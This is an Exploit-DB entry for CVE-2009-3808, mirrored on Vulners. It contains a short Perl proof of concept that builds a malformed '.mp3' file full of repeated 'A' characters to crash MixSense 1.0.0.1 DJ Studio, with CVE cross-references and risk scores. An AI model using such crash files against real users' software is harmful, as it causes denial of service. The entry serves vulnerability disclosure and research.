Lucene search
+L

MixSense 1.0.0.1 DJ Studio - '.mp3' Crash

🗓️ 16 Jul 2009 00:00:00Reported by prodigyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

MixSense 1.0.0.1 DJ Studio '.mp3' file Crash Vulnerability Exploi

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-3808
16 Jul 200900:00
circl
cve
CVE
CVE-2009-3808
27 Oct 200916:00
cve
cvelist
Cvelist
CVE-2009-3808
27 Oct 200916:00
cvelist
euvd
EUVD
EUVD-2009-3780
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-3808
27 Oct 200916:30
nvd
prion
Prion
Code injection
27 Oct 200916:30
prion
#!/usr/bin/perl -w
#
# MixSense 1.0.0.1 DJ Studio (.mp3 file) Crash Vulnerability Exploit
#
# Founded and exploited by prodigy
#
# Contact: [email protected]
#
# Vendor: MixSense
#
# Usage to reproduce the bug: when you created the malicious file, open with Mixsense and booom!
#
# Platform: Windows
#
###################################################################

==PoC==

use strict;

use diagnostics;

my $file= "crash.mp3";

my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

print "File Created successfully\n";

==EndPoC==


##Greetz: Greetz myself for find the bug.

# milw0rm.com [2009-07-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Jul 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.0448
28